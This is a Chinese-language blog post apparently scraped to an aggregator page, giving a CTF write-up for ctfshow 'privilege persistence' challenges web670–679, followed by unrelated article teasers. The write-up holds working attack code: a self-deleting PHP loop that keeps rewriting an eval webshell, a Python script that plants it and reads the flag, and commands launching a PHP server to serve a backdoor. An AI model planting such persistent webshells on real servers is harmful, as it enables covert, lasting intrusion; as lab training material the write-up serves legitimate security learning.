当前位置：首页 > news >正文

ctfshow 权限维持 web670--web679

news 2025/11/6 0:31:35

web670

<?php// 题目说明：
// 想办法维持权限，确定无误后提交check，通过check后，才会生成flag，此前flag不存在error_reporting(0);
highlight_file(__FILE__);$a=$_GET['action'];switch($a){case 'cmd':eval($_POST['cmd']);break;case 'check':file_get_contents("http://checker/api/check");break;default:die('params not validate');
}params not validate

在这里插入图片描述
check之后直接啥都没了，应该是rm rm -rf *
打入不死🐎应该可以
但是需要看看有么有权限写入

可以那么我们上马

<?phpignore_user_abort(true);   //忽略客户端断开set_time_limit(0);         //一直执行unlink(__FILE__);			//隐藏脚本$file = 'shell.php';$code = '<?php @eval($_POST[1]);?>';while (1) {file_put_contents($file, $code);usleep(5000);       //暂停5ms}
?>

?action=cmdPOST:
cmd=file_put_contents('a.php','<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file=\'shell.php\';$code=\'<?=@eval($_POST[1]);?>\';while(1) {file_put_contents($file,$code);usleep(5000);}?>');

这样子写入了
在这里插入图片描述
先访问一下url/a.php
让不死🐎开始运行再而看看shell.php是不是已经生成了
生成过后check，flag就被生成了即可

在这里插入图片描述

web671–web676

import requests
url="http://c2f4f600-6fe1-4b93-8481-842c6a5a0c32.challenge.ctf.show/"
data_ma={'cmd':"file_put_contents('a.php',\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file='shell.php';\\$code='<?php @eval(\\$_POST[1]);?>';while(1) {file_put_contents(\\$file,\\$code);usleep(5000);}?>\");"
}r=requests.post(url+'?action=cmd',data=data_ma)try:requests.get(url+'a.php',timeout=(1,1))      # 2s
except:requests.get(url+'?action=check')r=requests.post(url+'shell.php',data={'1':'echo `tac /f*`;'})print(r.text)

步骤都一样直接写个脚本打打吧
但是介于环境的特殊,只能是打一次如果失败了就得改脚本重开环境了,和污染一样的道理

web677–web678

一直看就可以了,没有写入权限

system('while true;do tac /f*;done');

刷了7 8次靶机了吧,嗯不懂whathappen就是不出flag
在这里插入图片描述
终于等了两分钟左右出flag了,因为check是直接把所有的东西都删了,如果后面再重新去的话,就无法访问了,只能等已经执行的命令出flag

web679

这道题特别像之前的一个公开赛,必须迅速的check不然就给你删了,所以
(check会关闭web服务,自己开)

php -S 0.0.0.0:80 -t /tmp/
启动内置服务器

写入默认的索引文件,并且访问的时候直接访问url就可以了

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST[1]);?>");system("cd /tmp;sleep 10;php -S 0.0.0.0:80 -t /tmp/");
//这里要用双引号
或者
cmd=system('cd /tmp;echo "<?php eval(\$_POST[1]);?>" > index.php;sleep 10;php -S 0.0.0.0:80');

打进去之后(10s内)马上check,然后等一会如果说的server关闭那失败了,如果马来了,那就对了
在这里插入图片描述

ctfshow 权限维持 web670--web679

web670 <?php// 题目说明： // 想办法维持权限，确定无误后提交check，通过check后，才会生成flag，此前flag不存在error_reporting(0); highlight_file(__FILE__);$a$_GET[action];switch($a){case cmd:eval($_POST[c…...

编程日记 2024/7/31 11:38:19

职场生存指南

求职篇面试潜台词分析（1）介绍： “请做一下自我介绍？” ❌：慢吞吞的介绍：叫什么，来自学校，专业，工作了那几家公司。问题目的：个人优势+岗位匹配度+个人身上技能标签（2）反问： “你还有什么想问的吗？” 问题目的：对工作的好奇心+个人积极性<——岗位…...

编程日记 2024/7/31 11:37:18

Spring实例化的策略有几种 ，可以看一下 InstantiationStrategy 相关的类。 UML 结构图 InstantiationStrategy的实现类有 SimpleInstantiationStrategy。 CglibSubclassingInstantiationStrategy 又继承了SimpleInstantiationStrategy。 InstantiationStrategy I…...

编程日记 2024/7/31 11:36:16

部署KVM虚拟化平台

文章目录 KVM虚拟化架构KVM组成KVM虚拟化三种模式 KVM虚拟化架构 KVM模块直接整合在Linux内核中 KVM组成 e KVM Driver虚拟机创建虚拟机内存分配虚拟CPU寄存器读写虚拟CPU运行 QEMU(快速仿真器) 模拟PC硬件的用户控件组件提供I/O设备模型及访问外设的途径 KVM虚拟化三种模式客…...

编程日记 2024/7/31 11:35:14

Java对象模型深度剖析：从POJO到ENTITY

引言在Java企业级应用开发中，对象模型是构建软件架构的核心。它们不仅帮助我们组织代码，还提升了代码的可读性和可维护性。本文将深入介绍Java中的几种关键对象模型：POJO、DTO、DAO、PO、BO、VO、QO和ENTITY，以及DO，…...

编程日记 2024/7/31 11:33:12

Nginx日志分析：编写Shell脚本进行全面日志统计

Nginx是一个高性能的HTTP和反向代理服务器，也是一个IMAP/POP3/SMTP代理服务器。无论是在大流量的网站还是小型的个人博客中，Nginx都得到了广泛应用。在实际生产环境中，对Nginx日志的分析有助于我们了解网站的访问情况，发现潜在问题…...

编程日记 2024/7/31 11:32:11

【Gin】深度解析：在Gin框架中优化应用程序流程的责任链设计模式(下)

【Gin】深度解析：在Gin框架中优化应用程序流程的责任链设计模式(下) 大家好我是寸铁👊 【Gin】深度解析：在Gin框架中优化应用程序流程的责任链设计模式(下)✨ 喜欢的小伙伴可以点点关注 💝 前言本次文章分为上下两部分&#xf…...

编程日记 2024/7/31 11:31:10

C语言——运算符及表达式

C语言——运算符及表达式运算符运算符的分类（自增运算符）、--（自减运算符）赋值运算符逗号运算符（顺序求值运算符） 表达式运算符运算符的分类 C语言的运算符范围很宽，除了控制语句和输入输出…...

编程日记 2024/7/31 11:30:08

Python面试宝典第23题：分发糖果

题目 n 个孩子站成一排，给你一个整数数组 ratings 表示每个孩子的评分。你需要按照以下要求，给这些孩子分发糖果。 （1）每个孩子至少分配到 1 个糖果。 （2）相邻两个孩子评分更高的孩子会获得更多的糖果。请…...

编程日记 2024/7/31 11:27:05

Java与模式及其应用场景知识点分享(电子版)

前言 Java 编程语言自1995年问世以来，其成功好像任何编程语言都无法媲美。生逢其时(互联网的兴起)固然是一方面的原因，而Java吸收总结了前人的经验教训，反映了最新技术(the state ofthe art)，对其受到欢迎和采用，恐怕…...

编程日记 2024/7/31 11:25:00

软考高级第四版备考--第36天（审计内容）

IT内部控制审计：IT内部控制审计主要包括组织层面IT控制审计、IT一般控制审计及应用控制审计 IT专项审计：IT专项审计主要包括信息系统生命周期审计、信息系统开发过程审计、信息系统运行维护审计、网络与信息安全审计、信息系统项目审计、数据审计...

编程日记 2024/7/31 11:22:57

文件IO相关作业

1> 使用文件IO完成，将源文件中的所有内容进行加密（大写转小写、小写转大写）后写入目标文件中源文件内容不变 #include<myhead.h>int main(int argc, const char *argv[]) {//判断传入的是否是两个文件if(argc!3){write(2,"inp…...

编程日记 2024/7/31 11:21:56

vue3 watch监听父子组件通信

目录 01 watch监听方式 02 父子组件的通信 01 watch监听方式 1.watch(被监听的变量,(新值,旧值)>{ }) 默认直接就是深层监听如果想要配置深度监听和默认触发需要在第三个参数定义options对象 2.watch(被监听的变量,()>{},{ deep:true, immediate:true 项目打开后就执…...

编程日记 2024/7/31 11:19:52

【信创】adduser与useradd的区别 _ 统信 _ 麒麟 _ 中科方德

原文链接：【信创】adduser与useradd的区别 | 统信 | 麒麟 | 中科方德 Hello，大家好啊！今天给大家带来一篇关于在信创终端操作系统上adduser和useradd命令区别的文章。adduser和useradd都是用于在Linux系统上添加用户的命令，但它们…...

编程日记 2024/7/31 11:17:50

微软Win11 24H2最新可选更新补丁26100.1301来袭！

系统之家于7月31日发出最新报道，微软针对Win11 24H2用户推出七月最新的可选更新KB5040529，本次更新为开始菜单引入了全新的账号管理器，也改进了任务栏上的小组件图标。接下来跟随系统之家小编来看看本次更新的详细内容吧！【推荐下…...

编程日记 2024/7/31 11:16:49

层次特征的尺度艺术：sklearn中的缩放技术

层次特征的尺度艺术：sklearn中的缩放技术在机器学习中，特征缩放（Feature Scaling）是数据预处理的重要步骤，尤其对于基于距离的算法，如K-近邻（KNN）和支持向量机（SVM&…...

编程日记 2024/7/31 11:15:48

Chapter 21 深入理解JSON

欢迎大家订阅【Python从入门到精通】专栏，一起探索Python的无限可能！ 文章目录前言一、JSON数据格式1. 什么是JSON？2. JSON数据的格式二、JSON格式数据转化三、格式化JSON数据的在线工具前言在当今数据驱动的世界中，JSON&…...

编程日记 2024/7/31 11:14:47

【C++高阶数据结构】红黑树：全面剖析与深度学习

目录 🚀 前言：红黑树与AVL树的比较一： 🔥 红黑树的概念二： 🔥 红黑树的性质三： 🔥 红黑树节点的定义和结构🚀 3.1 基本元素🚀 3.2 节点颜色🚀 3.…...

编程日记 2024/7/31 11:13:46

前端基于 axios 实现批量任务调度管理器 demo

一、背景介绍这是一个基于 axios 实现的批量任务调度管理器的 demo。它使用了axios、promise 等多种技术和原理来实现批量处理多个异步请求，并确保所有请求都能正确处理并报告其状态。假设有一个场景：有一个任务列表，有单个任务的处理功能…...

编程日记 2024/7/31 11:12:45

Docker容器下面home assistant忘记账号密码怎么重置？

环境： docker ha 问题描述： Docker容器下面home assistant忘记账号密码怎么重置？ 解决方案： 你可以按照以下步骤来找回或重置密码： 方法一 (未解决) 停止并删除当前的Home Assistant容器（确保你已经保…...

编程日记 2024/7/31 11:11:44

谷歌浏览器插件

项目中有时候会用到插件 sync-cookie-extension1.0.0：开发环境同步测试 cookie 至 localhost，便于本地请求服务携带 cookie 参考地址：https://juejin.cn/post/7139354571712757767 里面有源码下载下来，加在到扩展即可使用FeHelp…...

编程新知 2025/8/16 3:55:30